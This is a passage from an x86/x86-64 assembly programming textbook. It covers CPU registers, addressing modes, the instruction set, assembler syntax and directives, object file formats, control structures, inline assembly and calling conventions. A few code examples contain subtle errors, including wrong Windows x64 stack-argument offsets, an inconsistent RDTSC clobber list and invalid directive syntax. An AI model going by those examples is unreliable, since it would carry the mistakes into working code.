Bit 31: PG - Paging Enable

CR1: Reserved

CR2: Page Fault Linear Address (address that caused fault)

CR3: Page Directory Base Register (physical address of top-level page table)

CR4 (Extended Features)

Bit 0: VME - Virtual-8086 Mode Extensions
Bit 1: PVI - Protected-Mode Virtual Interrupts
Bit 2: TSD - Time Stamp Disable (RDTSC privilege)
Bit 3: DE - Debugging Extensions
Bit 4: PSE - Page Size Extensions
Bit 5: PAE - Physical Address Extensions
Bit 6: MCE - Machine Check Enable
Bit 7: PGE - Page Global Enable
Bit 8: PCE - Performance-Monitoring Counter Enable
Bit 9: OSFXSR - OS Supports FXSAVE/FXRSTOR
Bit 10: OSXMMEXCPT - OS Supports SIMD Exceptions
Bit 11: UMIP - User-Mode Instruction Prevention
Bit 12: FSGSBASE - Enable RDFSBASE/WRFSBASE instructions
Bit 13: PCIDE - Process-Context Identifiers
Bit 14: OSXSAVE - OS Supports XSAVE/XRSTOR
Bit 16: SMEP - Supervisor Mode Execution Protection
Bit 17: SMAP - Supervisor Mode Access Prevention

CR8: Task Priority Register (for interrupt masking)

EFER (Extended Feature Enable Register, MSR)

Bit 0: SCE - System Call Extensions (SYSCALL/SYSRET)
Bit 8: LME - Long Mode Enable
Bit 10: LMA - Long Mode Active
Bit 11: NXE - No-Execute Enable

5.4 Debug Registers

DR0-DR7 support hardware breakpoints.

DR0-DR3: Linear breakpoint addresses

DR6: Debug status (which breakpoint triggered)

Bit 0: B0 - Breakpoint 0 condition
Bit 1: B1 - Breakpoint 1 condition
Bit 2: B2 - Breakpoint 2 condition
Bit 3: B3 - Breakpoint 3 condition
Bit 13: BD - Debug register access detected
Bit 14: BS - Single step
Bit 15: BT - Task switch

DR7: Debug control

Bits 0-1: L0,G0 - Local/Global enable for breakpoint 0
Bits 2-3: L1,G1 - Breakpoint 1
Bits 4-5: L2,G2 - Breakpoint 2
Bits 6-7: L3,G3 - Breakpoint 3
Bits 8-11: LE,GE - Exact breakpoint (deprecated)
Bits 16-31: R/W0-3, LEN0-3 (type and length for each breakpoint)

Breakpoint Types (R/W field):

00: Instruction execution
01: Data writes
10: I/O reads/writes (requires CR4.DE)
11: Data reads/writes

Breakpoint Length (LEN field):

00: 1 byte
01: 2 bytes
10: 8 bytes (or reserved)
11: 4 bytes

5.5 Flags Register (EFLAGS/RFLAGS)

The flags register stores status and control bits.

Status Flags (updated by arithmetic)

Bit 0: CF - Carry Flag (unsigned overflow)
Bit 2: PF - Parity Flag (even parity of low byte)
Bit 4: AF - Auxiliary Carry (BCD operations)
Bit 6: ZF - Zero Flag (result zero)
Bit 7: SF - Sign Flag (negative result)
Bit 11: OF - Overflow Flag (signed overflow)

Control Flags

Bit 8: TF - Trap Flag (single-step for debugging)
Bit 9: IF - Interrupt Enable Flag
Bit 10: DF - Direction Flag (0=up, 1=down for string ops)
Bit 12-13: IOPL - I/O Privilege Level
Bit 14: NT - Nested Task

System Flags

Bit 16: RF - Resume Flag (debugging)
Bit 17: VM - Virtual-8086 Mode
Bit 18: AC - Alignment Check
Bit 19: VIF - Virtual Interrupt Flag
Bit 20: VIP - Virtual Interrupt Pending
Bit 21: ID - ID Flag (CPUID support)

Common Flag Operations

; Clear carry
clc

; Set carry
stc

; Complement carry
cmc

; Clear direction (string ops increment)
cld

; Set direction (string ops decrement)
std

; Clear interrupt flag
cli

; Set interrupt flag
sti

; Push flags onto stack
pushfq

; Pop flags from stack
popfq

; Load flags into AH (for 16-bit)
lahf

; Store AH into flags
sahf

5.6 Stack Organization

The stack is a Last-In-First-Out (LIFO) data structure.

Stack Operations

; Push: decrement RSP, store value
push rax        ; RSP -= 8, [RSP] = RAX

; Pop: load value, increment RSP
pop rax         ; RAX = [RSP], RSP += 8

; Call: push return address, jump
call func       ; push RIP (next instruction), jmp func

; Return: pop return address, jump
ret             ; pop RIP, jmp

Stack Frame Layout

Typical function prologue:

push rbp        ; save caller's frame pointer
mov rbp, rsp    ; set our frame pointer
sub rsp, 32     ; allocate local variables

Stack layout:

High addresses
+-----------------+
| Caller's frame  |
+-----------------+ <--- RBP+16 (first arg)
| Return address  |
+-----------------+ <--- RBP+8
| Saved RBP       |
+-----------------+ <--- RBP
| Local variables |
+-----------------+ <--- RBP-x
| (alignment)     |
+-----------------+ <--- RSP
Low addresses

Stack Alignment

x86-64 ABI requires 16-byte stack alignment before call:

RSP must be multiple of 16
call pushes 8-byte return address (misaligns by 8)
Function prologue re-aligns

5.7 Memory Addressing Modes

x86 provides flexible addressing modes.

Immediate (constant in instruction)

mov rax, 42      ; 42 is immediate

Register (value in register)

mov rax, rbx     ; content of RBX

Direct (address constant)

mov rax, [0x1234]    ; load from absolute address

Register Indirect

mov rax, [rbx]       ; address in RBX

Base + Displacement

mov rax, [rbx + 16]   ; RBX + 16
mov rax, [array + 8]  ; constant + 8

Indexed

mov rax, [rbx + rcx*8]   ; RBX + RCX*8

Base + Index + Displacement

mov rax, [rbx + rcx*4 + 16]   ; most complex form

RIP-Relative (64-bit only)

mov rax, [rip + offset]   ; relative to current instruction

Addressing Mode Encodings

MODRM byte structure:

7 6 5 4 3 2 1 0
+-----+-----+-----+
| Mod | Reg | R/M |
+-----+-----+-----+

SIB byte (Scale-Index-Base):

7 6 5 4 3 2 1 0
+-----+-----+-----+
|Scale|Index|Base |
+-----+-----+-----+
Scale: 00=1, 01=2, 10=4, 11=8

Chapter 6: Instruction Set Architecture (ISA)

6.1 Data Movement Instructions

MOV (Move)

Most common instruction, copies data between registers/memory.

mov rax, rbx          ; register to register
mov rax, [mem]        ; memory to register
mov [mem], rax        ; register to memory
mov rax, 1234         ; immediate to register
mov [mem], 1234       ; immediate to memory (size must match)

Size specifiers (NASM):

mov byte [mem], 12    ; 8-bit
mov word [mem], 1234  ; 16-bit
mov dword [mem], 1234 ; 32-bit
mov qword [mem], 1234 ; 64-bit

MOVZX (Move with Zero-Extend)

movzx eax, bl         ; zero-extend BL to EAX
movzx rax, bx         ; zero-extend BX to RAX

MOVSX (Move with Sign-Extend)

movsx eax, bl         ; sign-extend BL to EAX
movsx rax, bx         ; sign-extend BX to RAX
movsxd rax, ebx       ; sign-extend 32-bit to 64-bit (special)

XCHG (Exchange)

xchg rax, rbx         ; swap RAX and RBX
xchg [mem], rax       ; atomic exchange with memory

PUSH/POP (Stack operations)

push rax              ; push RAX onto stack
push 1234             ; push immediate
push word 1234        ; push 16-bit immediate
pop rax               ; pop into RAX
pop [mem]             ; pop into memory

LEA (Load Effective Address)

Computes address but doesn't access memory.

lea rax, [rbx+rcx*4]  ; RAX = RBX + RCX*4
lea rax, [array]      ; RAX = address of array (RIP-relative)

Common trick: LEA for arithmetic:

lea eax, [ebx+ecx]    ; EAX = EBX + ECX (without setting flags)
lea eax, [ebx*4+ebx]  ; EAX = EBX*5

CMOV (Conditional Move)

cmp eax, ebx
cmovg ecx, edx        ; if EAX > EBX, ECX = EDX

MOVBE (Move with Byte Swap)

movbe eax, [mem]      ; load with byte swap (little-endian to big-endian)

6.2 Arithmetic Instructions

Addition

add rax, rbx          ; RAX = RAX + RBX
add rax, 1234         ; RAX = RAX + 1234
add [mem], rax        ; memory += RAX

adc rax, rbx          ; add with carry (for multi-precision)

Subtraction

sub rax, rbx          ; RAX = RAX - RBX
sub rax, 1234         ; RAX = RAX - 1234

sbb rax, rbx          ; subtract with borrow

Multiplication

mul rbx               ; unsigned: RDX:RAX = RAX * RBX
imul rbx              ; signed: RDX:RAX = RAX * RBX

imul rax, rbx         ; RAX = RAX * RBX
imul rax, rbx, 1234   ; RAX = RBX * 1234

Division

div rbx               ; unsigned: RAX = RDX:RAX / RBX, RDX = remainder
idiv rbx              ; signed: same

Increment/Decrement

inc rax               ; RAX++
dec rax               ; RAX--

Negation

neg rax               ; RAX = -RAX (two's complement)

Comparison

cmp rax, rbx          ; set flags based on RAX - RBX
test rax, rax         ; set flags based on RAX & RAX (check zero)

6.3 Logical Instructions

AND

and rax, rbx          ; RAX = RAX & RBX
and rax, 0x0F         ; mask low 4 bits
and [mem], rax        ; memory &= RAX

or rax, rbx           ; RAX = RAX | RBX
or rax, 0x80          ; set bit 7

XOR

xor rax, rbx          ; RAX = RAX ^ RBX
xor rax, rax          ; zero RAX (most efficient)

NOT

not rax               ; RAX = ~RAX (one's complement)

TEST

test rax, rbx         ; set flags based on RAX & RBX (no destination)
test rax, rax         ; check if RAX is zero/negative

6.4 Control Flow Instructions

Unconditional Jumps

jmp label            ; jump to label
jmp rax              ; jump to address in RAX (register indirect)
jmp [mem]            ; jump to address in memory

Conditional Jumps

Based on flags:

jz  label    ; jump if zero (ZF=1)
jnz label    ; jump if not zero (ZF=0)
je  label    ; jump if equal (same as JZ)
jne label    ; jump if not equal (same as JNZ)

jg  label    ; jump if greater (signed) (ZF=0 and SF=OF)
jge label    ; jump if greater or equal (signed) (SF=OF)
jl  label    ; jump if less (signed) (SF≠OF)
jle label    ; jump if less or equal (signed) (ZF=1 or SF≠OF)

ja  label    ; jump if above (unsigned) (CF=0 and ZF=0)
jae label    ; jump if above or equal (unsigned) (CF=0)
jb  label    ; jump if below (unsigned) (CF=1)
jbe label    ; jump if below or equal (unsigned) (CF=1 or ZF=1)

jc  label    ; jump if carry (CF=1)
jnc label    ; jump if not carry (CF=0)
jo  label    ; jump if overflow (OF=1)
jno label    ; jump if not overflow (OF=0)
js  label    ; jump if sign (SF=1)
jns label    ; jump if not sign (SF=0)
jp  label    ; jump if parity (PF=1)
jnp label    ; jump if not parity (PF=0)

Loop Instructions

loop label           ; decrement RCX, jump if RCX != 0
loope label          ; loop while ZF=1 and RCX != 0
loopne label         ; loop while ZF=0 and RCX != 0

Call and Return

call func            ; push return address, jump to func
ret                  ; pop return address, jump
ret 16               ; pop return address, add 16 to RSP

Interrupts

int 0x80             ; software interrupt (legacy Linux syscall)
int3                 ; breakpoint interrupt
into                 ; interrupt on overflow
iret                 ; return from interrupt

6.5 String Instructions

String instructions operate on memory with automatic pointer updates.

MOVS (Move String)

movsb                ; move byte from [RSI] to [RDI], update pointers
movsw                ; move word
movsd                ; move dword
movsq                ; move qword (64-bit)

; Repeat prefix for blocks
rep movsb            ; repeat RCX times

CMPS (Compare String)

cmpsb                ; compare byte at [RSI] with [RDI]
rep cmpsb            ; compare until difference found
repe cmpsb           ; compare while equal
repne cmpsb          ; compare while not equal

SCAS (Scan String)

scasb                ; compare AL with [RDI]
scasw                ; compare AX with [RDI]
scasd                ; compare EAX with [RDI]
scasq                ; compare RAX with [RDI]

repne scasb          ; scan for AL

STOS (Store String)

stosb                ; store AL to [RDI]
stosw                ; store AX to [RDI]
stosd                ; store EAX to [RDI]
stosq                ; store RAX to [RDI]

rep stosb            ; fill memory with AL

LODS (Load String)

lodsb                ; load from [RSI] to AL
lodsw                ; load to AX
lodsd                ; load to EAX
lodsq                ; load to RAX

6.6 Bit Manipulation Instructions

Shift Instructions

shl rax, 1           ; shift left, fill with 0
shr rax, 1           ; shift right, fill with 0
sal rax, 1           ; shift arithmetic left (same as SHL)
sar rax, 1           ; shift arithmetic right (preserve sign)

; Variable shifts
shl rax, cl          ; shift by CL

Rotate Instructions

rol rax, 1           ; rotate left
ror rax, 1           ; rotate right
rcl rax, 1           ; rotate through carry left
rcr rax, 1           ; rotate through carry right

Bit Test Instructions

bt rax, 5            ; test bit 5, copy to CF
bts rax, 5           ; test and set
btr rax, 5           ; test and reset
btc rax, 5           ; test and complement

; Memory forms
bt [mem], 5          ; test bit in memory

Bit Scan

bsf rax, rbx         ; bit scan forward (find first 1)
bsr rax, rbx         ; bit scan reverse (find last 1)
tzcnt rax, rbx       ; trailing zero count (BMI1)
lzcnt rax, rbx       ; leading zero count (BMI1)
popcnt rax, rbx      ; population count (NEhalem+)

6.7 System Instructions

Privileged Instructions

lgdt [mem]           ; load GDT
sgdt [mem]           ; store GDT
lidt [mem]           ; load IDT
sidt [mem]           ; store IDT
lldt ax              ; load LDT
sldt rax             ; store LDT
ltr ax               ; load task register
str rax              ; store task register

mov cr0, rax         ; move to control register
mov rax, cr3         ; move from control register
mov dr0, rax         ; move to debug register

invlpg [mem]         ; invalidate TLB entry
wbinvd               ; write back and invalidate cache

System Call Instructions

syscall              ; fast system call (64-bit)
sysret               ; return from syscall

sysenter             ; fast system call (32-bit)
sysexit              ; return from sysenter

int 0x80             ; legacy interrupt-based syscall

Halt and Wait

hlt                  ; halt processor until interrupt
pause                ; spin loop hint (improves power/performance)

6.8 SIMD (SSE, AVX, AVX-512)

SIMD instructions process multiple data elements in one instruction.

SSE Registers

XMM0-XMM15: 128-bit (16 bytes)
Support for integer and floating-point operations

SSE Data Types

; Packed types
__m128               ; 4 floats
__m128d              ; 2 doubles
__m128i              ; integer (16 bytes)

; Scalar types
__m128               ; single float (high 96 bits ignored)

Basic SSE Instructions

; Move
movaps xmm0, xmm1     ; move aligned packed single
movups xmm0, [mem]    ; move unaligned packed single
movss xmm0, [mem]     ; move scalar single

; Arithmetic
addps xmm0, xmm1      ; add packed single
addss xmm0, xmm1      ; add scalar single
subps, mulps, divps, sqrtps, etc.

; Logical
andps xmm0, xmm1      ; bitwise AND
orps, xorps

; Compare
cmpps xmm0, xmm1, 0   ; compare equal (packed)
cmpps xmm0, xmm1, 1   ; compare less
cmpps xmm0, xmm1, 2   ; compare less or equal

AVX (Advanced Vector Extensions)

256-bit YMM registers:

vmovaps ymm0, ymm1    ; move 8 floats
vaddps ymm0, ymm1, ymm2 ; add 8 floats (3-operand)

AVX-512

512-bit ZMM registers with masking:

; Masked operation
vpaddd zmm0 {k1}, zmm1, zmm2  ; add with mask k1

6.9 FPU Instructions

Legacy x87 FPU (rarely used now, but still present).

FPU Register Stack

8 registers (ST0-ST7) as a stack:

ST(0) is top
Values are 80-bit extended precision

FPU Instructions

; Data transfer
fld [mem]            ; load float to ST0
fst [mem]            ; store ST0 to memory
fstp [mem]           ; store and pop

; Arithmetic
fadd st0, st1        ; ST0 = ST0 + ST1
fsub, fmul, fdiv

; Compare
fcom st1             ; compare ST0 with ST1
fcomp                ; compare and pop
fcompp               ; compare and pop twice

; Constants
fldz                 ; load 0.0
fld1                 ; load 1.0
fldpi                ; load π

; Transcendental
fsin, fcos, fpatan   ; sine, cosine, arctan
fyl2x                ; y * log2(x)

PART III — Assembly Language Programming

Chapter 7: Introduction to Assembly Syntax

7.1 Intel vs AT&T Syntax

Two main syntax families for x86 assembly.

Intel Syntax (NASM, MASM, FASM)

; Instruction destination, source
mov eax, ebx         ; copy EBX to EAX
mov eax, [ebx+4]     ; load from memory
mov dword [eax], 10  ; store immediate to memory
jmp label            ; jump to label

AT&T Syntax (GAS)

; Instruction source, destination (opposite order)
movl %ebx, %eax      ; copy EBX to EAX
movl 4(%ebx), %eax   ; load from memory
movl $10, (%eax)     ; store immediate to memory
jmp label            ; jump to label

Key Differences

Feature	Intel	AT&T
Order	dest, src	src, dest
Register	eax	%eax
Immediate	123	$123
Memory	[ebx+4]	4(%ebx)
Size	dword ptr	l (long)
Address	[eax+ebx*4]	(%eax,%ebx,4)

Size Mnemonics (AT&T)

b = byte (8-bit)
w = word (16-bit)
l = long (32-bit)
q = quad (64-bit)
t = ten bytes (80-bit)

7.2 Assembler Directives

Assembler directives control the assembly process.

NASM Directives

; Section directives
section .text         ; code section
section .data         ; initialized data
section .bss          ; uninitialized data

; Data definition
db 0x55               ; define byte
dw 0x1234             ; define word
dd 0x12345678         ; define dword
dq 0x123456789ABCDEF0 ; define qword
dt 1.234              ; define 80-bit float

; Multiple values
db 1, 2, 3, 4         ; sequence of bytes
times 100 db 0        ; repeat 100 times

; Strings
db 'Hello', 0         ; C-style string
db "Hello", 10        ; with newline

; Equates
EQU value 100         ; constant
%define macro(x) x+1  ; macro

; Alignment
align 16              ; align to 16-byte boundary
alignb 16             ; align in BSS (no data emitted)

; Symbols
global _start         ; export symbol
extern printf         ; import symbol

MASM Directives

.MODEL flat, C        ; memory model
.STACK 4096           ; stack size

.DATA
var1 DB 10            ; byte variable
var2 DW 1234h         ; word variable
array DD 10 DUP(0)    ; 10 dwords initialized to 0
msg DB "Hello", 0     ; string

.CODE
main PROC
    mov eax, 0
    ret
main ENDP

END main

7.3 Sections (.text, .data, .bss)

Executable files are organized into sections.

.text Section

Contains executable code:

Read-only (usually)
Shared among processes
Contains instructions and constants

section .text
global _start

_start:
    mov eax, 1        ; syscall number
    mov ebx, 0        ; exit code
    int 0x80          ; kernel call

.data Section

Initialized data:

Read-write
Values defined at compile time
Takes space in executable

section .data
message db 'Hello, World!', 10, 0
len equ $ - message   ; length calculation

array dd 1, 2, 3, 4, 5
count dd 5

pi dq 3.141592653589793

.bss Section

Uninitialized data:

Read-write
Takes no space in executable
Zero-filled at program start

section .bss
buffer resb 4096      ; reserve 4096 bytes
temp resd 1           ; reserve one dword
array resq 100        ; reserve 100 qwords

7.4 Labels and Symbols

Labels represent addresses in the code or data.

Local Labels

loop_start:
    dec ecx
    jnz loop_start

; Local labels starting with .
func:
    .loop:            ; local to func
        dec ecx
        jnz .loop
    ret

Special Symbols

$                      ; current address
$$                     ; start of current section

section .data
msg db 'Hello', 0
.len equ $ - msg       ; length of string

7.5 Comments & Documentation Standards

Good comments are essential in assembly.

Comment Styles

; Single line comment (NASM, GAS)

; Multi-line comment
; can continue
; on multiple lines

%if 0                  ; NASM block comment
    This is commented out
%endif

/*
 * C-style comment (GAS, MASM)
 * Can span multiple lines
 */

Documentation Standards

; Function: strcpy - copy string
; Arguments:
;   RDI - destination buffer
;   RSI - source string
; Returns:
;   RAX - destination (like C strcpy)
; Clobbers:
;   RCX, RFLAGS
; Notes:
;   Assumes buffers are large enough
;   Copies until null terminator
strcpy:
    push rbp
    mov rbp, rsp
    
    ; Save registers we'll use
    push rcx
    push rsi
    push rdi
    
    ; Main copy loop
    xor rcx, rcx        ; counter
.copy_loop:
    mov al, [rsi + rcx] ; get source byte
    mov [rdi + rcx], al ; store to destination
    inc rcx
    test al, al         ; check for null
    jnz .copy_loop
    
    ; Restore and return
    pop rdi
    pop rsi
    pop rcx
    pop rbp
    ret

Chapter 8: Using Assemblers

8.1 NASM (Netwide Assembler)

NASM is the most popular assembler for x86 on Unix-like systems.

Basic Usage

# Assemble to object file
nasm -f elf64 program.asm -o program.o

# Assemble with debug info
nasm -f elf64 -g program.asm -o program.o

# Generate listing file
nasm -f elf64 -l program.lst program.asm

# Preprocess only
nasm -E program.asm

# Link with ld
ld program.o -o program

# Link with glibc
gcc -no-pie program.o -o program

NASM Example

; hello.asm - Hello World program
section .data
    msg db 'Hello, World!', 10, 0
    len equ $ - msg

section .text
    global _start

_start:
    ; Write syscall
    mov rax, 1          ; sys_write
    mov rdi, 1          ; stdout
    mov rsi, msg        ; buffer
    mov rdx, len        ; length
    syscall

    ; Exit syscall
    mov rax, 60         ; sys_exit
    xor rdi, rdi        ; status 0
    syscall

NASM Features

Macro preprocessor
Conditional assembly
Structure definitions
Local labels
Expression evaluation

8.2 MASM (Microsoft Macro Assembler)

MASM is the traditional assembler for Windows.

MASM Example

; hello.asm - Hello World for Windows
.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib

.data
    msg db "Hello, World!", 13, 10, 0
    len equ $ - msg

.code
start:
    invoke StdOut, addr msg
    invoke ExitProcess, 0

end start

MASM Features

High-level-like syntax (INVOKE)
Structure definitions
Record types
Simplified segment directives

8.3 GAS (GNU Assembler)

GAS is the default assembler on Linux/Unix systems.

GAS Example

# hello.s - Hello World in GAS syntax
.section .data
msg:
    .ascii "Hello, World!\n"
    len = . - msg

.section .text
.globl _start

_start:
    # write syscall
    movl $4, %eax       # sys_write
    movl $1, %ebx       # stdout
    movl $msg, %ecx     # buffer
    movl $len, %edx     # length
    int $0x80

    # exit syscall
    movl $1, %eax       # sys_exit
    movl $0, %ebx       # status
    int $0x80

GAS with Intel Syntax

.syntax noprefix
.intel_syntax noprefix

.section .data
msg: .ascii "Hello, World!\n"
len = . - msg

.section .text
.globl _start

_start:
    mov eax, 4
    mov ebx, 1
    mov ecx, offset msg
    mov edx, len
    int 0x80

    mov eax, 1
    xor ebx, ebx
    int 0x80

8.4 FASM (Flat Assembler)

FASM is a lightweight, high-performance assembler.

FASM Example

; hello.asm - Hello World in FASM
format ELF64 executable

segment readable executable
entry _start

_start:
    mov eax, 1          ; sys_write
    mov edi, 1          ; stdout
    mov esi, msg        ; buffer
    mov edx, len        ; length
    syscall

    mov eax, 60         ; sys_exit
    xor edi, edi        ; status
    syscall

segment readable writeable
msg db 'Hello, World!', 10
len = $ - msg

FASM Features

Self-compiling (written in assembly)
Very fast
Multiple output formats
Powerful macro system

8.5 Linking with LD

The GNU linker (ld) combines object files into executables.

Basic LD Usage

# Link single object
ld program.o -o program

# Link with libraries
ld -lc program.o -o program -dynamic-linker /lib64/ld-linux-x86-64.so.2

# Link with custom layout
ld -T script.ld program.o -o program

Linker Script Example

/* simple.ld - Simple linker script */
OUTPUT_FORMAT(elf64-x86-64)
ENTRY(_start)

SECTIONS
{
    . = 0x400000;      /* Starting address */
    
    .text : {
        *(.text)
        *(.text.*)
    }
    
    .data : {
        *(.data)
        *(.data.*)
    }
    
    .bss : {
        *(.bss)
        *(.bss.*)
    }
    
    /DISCARD/ : {
        *(.comment)
        *(.note.*)
    }
}

8.6 Object File Format (ELF, PE, Mach-O)

ELF (Executable and Linkable Format)

Standard format on Linux/Unix:

ELF Header
    - Magic number (7F 45 4C 46)
    - Architecture (x86-64)
    - Entry point
    - Program header offset
    - Section header offset

Program Header Table
    - Segment definitions (LOAD, INTERP, DYNAMIC)
    - Virtual addresses
    - Permissions (R, W, E)

Section Header Table
    - Section definitions (.text, .data, .bss)
    - Section sizes and offsets

Sections
    - Actual code and data
    - Symbol tables
    - Debug information

PE (Portable Executable)

Windows format:

DOS Header (MZ)
DOS Stub
PE Header
    - Signature (PE\0\0)
    - COFF header
    - Optional header

Section Table
    - .text (code)
    - .data (initialized data)
    - .rdata (read-only data)
    - .bss (uninitialized)
    - .idata (imports)
    - .edata (exports)
    - .reloc (relocations)

Sections
    - Actual code/data
    - Import/export tables
    - Resources

Mach-O

macOS format:

Header
    - Magic number
    - CPU type
    - File type

Load Commands
    - Segment definitions
    - Dynamic linking info
    - Thread state

Segments
    - __TEXT (code)
    - __DATA (data)
    - __LINKEDIT (linker info)

Chapter 9: Control Structures

9.1 Conditional Jumps

Implementing if-then-else structures.

Simple If

if (x > 10) {
    y = 1;
}

    cmp dword [x], 10
    jle .skip          ; jump if not > 10
    mov dword [y], 1
.skip:

If-Else

if (x > 10) {
    y = 1;
} else {
    y = 2;
}

    cmp dword [x], 10
    jle .else
    mov dword [y], 1
    jmp .endif
.else:
    mov dword [y], 2
.endif:

Complex Conditions

if (x > 10 && y < 20) {
    z = 1;
}

    cmp dword [x], 10
    jle .false         ; first condition false
    cmp dword [y], 20
    jge .false         ; second condition false
    mov dword [z], 1
    jmp .endif
.false:
    ; do nothing or else part
.endif:

9.2 Loops

While Loop

while (i < 10) {
    a[i] = 0;
    i++;
}

    xor ecx, ecx       ; i = 0
.while:
    cmp ecx, 10
    jge .end_while
    mov dword [array + ecx*4], 0
    inc ecx
    jmp .while
.end_while:

Do-While Loop

do {
    a[i] = 0;
    i++;
} while (i < 10);

    xor ecx, ecx
.do:
    mov dword [array + ecx*4], 0
    inc ecx
    cmp ecx, 10
    jl .do

For Loop

for (i = 0; i < 10; i++) {
    a[i] = i;
}

    xor ecx, ecx
.for:
    cmp ecx, 10
    jge .end_for
    mov [array + ecx*4], ecx
    inc ecx
    jmp .for
.end_for:

Using LOOP Instruction

    mov ecx, 10
    xor eax, eax
.loop:
    add eax, ecx
    loop .loop        ; dec ecx, jump if not zero

9.3 Switch Case Implementation

Jump Table Method

switch (x) {
    case 0: y = 10; break;
    case 1: y = 20; break;
    case 2: y = 30; break;
    default: y = 0;
}

    cmp eax, 2
    ja .default        ; if > 2, default
    
    jmp [jump_table + eax*8]  ; jump via table

jump_table:
    dq .case0
    dq .case1
    dq .case2

.case0:
    mov ebx, 10
    jmp .end_switch
.case1:
    mov ebx, 20
    jmp .end_switch
.case2:
    mov ebx, 30
    jmp .end_switch
.default:
    xor ebx, ebx
.end_switch:

Comparison Chain

For sparse or non-consecutive cases:

    cmp eax, 10
    je .case10
    cmp eax, 20
    je .case20
    cmp eax, 30
    je .case30
    jmp .default

9.4 Jump Tables

Jump tables enable efficient multi-way branching.

Computed GOTO

; Jump to address in RAX
jmp rax

; Jump to address from memory
jmp [jump_table + rbx*8]

; Indirect call
call [function_table + rcx*8]

Example: State Machine

state_machine:
    ; RBX = current state
    jmp [state_table + rbx*8]

state_table:
    dq state_idle
    dq state_active
    dq state_error
    dq state_done

state_idle:
    ; handle idle state
    ; set next state
    jmp state_machine

state_active:
    ; handle active state
    jmp state_machine

state_error:
    ; handle error
    jmp state_machine

state_done:
    ; finished
    ret

9.5 Inline Assembly in C/C++

GCC Extended ASM

int add(int a, int b) {
    int result;
    __asm__ volatile (
        "addl %%ebx, %%eax"
        : "=a" (result)
        : "a" (a), "b" (b)
        : "cc"
    );
    return result;
}

Syntax Breakdown:

__asm__ [volatile] (
    "instructions\n\t"
    : output operands   (optional)
    : input operands    (optional)
    : clobbered registers (optional)
);

Constraints:

"a" = use EAX
"b" = use EBX
"c" = use ECX
"d" = use EDX
"r" = any register
"m" = memory operand
"i" = immediate

Example: CPUID

void cpuid(int code, int *a, int *b, int *c, int *d) {
    __asm__ volatile (
        "cpuid"
        : "=a" (*a), "=b" (*b), "=c" (*c), "=d" (*d)
        : "a" (code)
        : "cc"
    );
}

Example: RDTSC

uint64_t rdtsc() {
    uint32_t lo, hi;
    __asm__ volatile (
        "rdtsc"
        : "=a" (lo), "=d" (hi)
        :
        : "ecx"  // rdtsc clobbers EDX:EAX only
    );
    return ((uint64_t)hi << 32) | lo;
}

MSVC Inline Assembly

int add(int a, int b) {
    __asm {
        mov eax, a
        add eax, b
        ; result in eax
    }
    // Value in EAX is returned
}

MSVC Limitations:

x64 doesn't support inline assembly
Must use separate .asm files for x64

Chapter 10: Functions and Procedures

10.1 Calling Conventions

Calling conventions define how functions receive parameters and return values.

System V AMD64 ABI (Linux, macOS, BSD)

Used on Unix-like systems for x86-64:

Integer/pointer arguments:
    RDI, RSI, RDX, RCX, R8, R9 (in order)
Floating-point arguments:
    XMM0-XMM7
Additional arguments: stack (right-to-left)

Return values:
    RAX (integer/pointer)
    RDX:RAX (128-bit)
    XMM0/XMM0:XMM1 (float)

Registers:
    Callee-saved: RBX, RBP, R12-R15
    Caller-saved: all others
    RAX, RCX, RDX, RSI, RDI, R8-R11 are scratch

Stack alignment: 16-byte before CALL

Example:

int func(int a, int b, int c, int d, int e, int f, int g) {
    return a + b + c + d + e + f + g;
}

; a=RDI, b=RSI, c=RDX, d=RCX, e=R8, f=R9, g=[RSP+8]
func:
    push rbp
    mov rbp, rsp
    
    add rdi, rsi      ; a+b
    add rdi, rdx      ; +c
    add rdi, rcx      ; +d
    add rdi, r8       ; +e
    add rdi, r9       ; +f
    add rdi, [rbp+16] ; +g (skip saved RBP + return address)
    
    mov rax, rdi      ; return value
    
    pop rbp
    ret

Microsoft x64 Calling Convention (Windows)

Arguments:
    RCX, RDX, R8, R9 (first four)
    Stack (right-to-left) for additional

Return values:
    RAX (integer/pointer)
    XMM0 (float)

Registers:
    Callee-saved: RBX, RBP, RDI, RSI, R12-R15, XMM6-XMM15
    Caller-saved: all others

Shadow space: Caller reserves 32 bytes on stack
Stack alignment: 16-byte before CALL

func:
    ; RCX = a, RDX = b, R8 = c, R9 = d
    ; [RSP+32] = e, [RSP+40] = f, [RSP+48] = g
    
    push rbp
    mov rbp, rsp
    
    add rcx, rdx      ; a+b
    add rcx, r8       ; +c
    add rcx, r9       ; +d
    add rcx, [rbp+40] ; +e (shadow space + saved RBP)
    add rcx, [rbp+48] ; +f
    add rcx, [rbp+56] ; +g
    
    mov rax, rcx
    
    pop rbp
    ret

cdecl (32-bit)

Classic 32-bit calling convention:

Arguments: stack (right-to-left)
Return: EAX
Caller cleans stack

push dword 3
push dword 2
push dword 1
call func
add esp, 12          ; caller cleans up

stdcall (32-bit Windows)

Like cdecl but callee cleans stack:

func proc
    push ebp
    mov ebp, esp
    mov eax, [ebp+8]  ; first arg
    ; ...
    pop ebp
    ret 12            ; return and clean 12 bytes
func endp

fastcall (32-bit)

First two/three arguments in registers:

ECX, EDX (Microsoft)
EAX, EDX, ECX (Borland)

10.2 Stack Frames

Prologue

push rbp             ; save caller's frame pointer
mov rbp, rsp         ; set our frame pointer
sub rsp, 32          ; allocate local variables

Epilogue

mov rsp, rbp         ; restore stack pointer
pop rbp              ; restore frame pointer
ret                  ; return

Frame Pointer Optimization

Compiler can omit frame pointer (-fomit-frame-pointer):

func:
    sub rsp, 40      ; allocate locals + alignment
    ; use RSP+offset for locals
    mov eax, [rsp+32] ; local variable
    add rsp, 40
    ret

10.3 Parameter Passing

Accessing Stack Arguments

32-bit (cdecl):

push ebp
mov ebp, esp

mov eax, [ebp+8]     ; first argument
mov ebx, [ebp+12]    ; second argument
; ...
mov esp, ebp
pop ebp
ret

64-bit (System V):

; First 6 args in registers
; 7th+ on stack at [RSP+8], [RSP+16], etc.

func:
    push rbp
    mov rbp, rsp
    
    ; RDI, RSI, RDX, RCX, R8, R9 are args
    mov rax, [rbp+16] ; 7th arg (skip return address + saved RBP)
    
    pop rbp
    ret

Variable Arguments (varargs)

int sum(int count, ...) {
    int total = 0;
    va_list args;
    va_start(args, count);
    for(int i = 0; i < count; i++)
        total += va_arg(args, int);
    va_end(args);
    return total;
}

Assembly must handle variable number of arguments:

; RDI = count
; RSI = first vararg, etc.
sum:
    push rbp
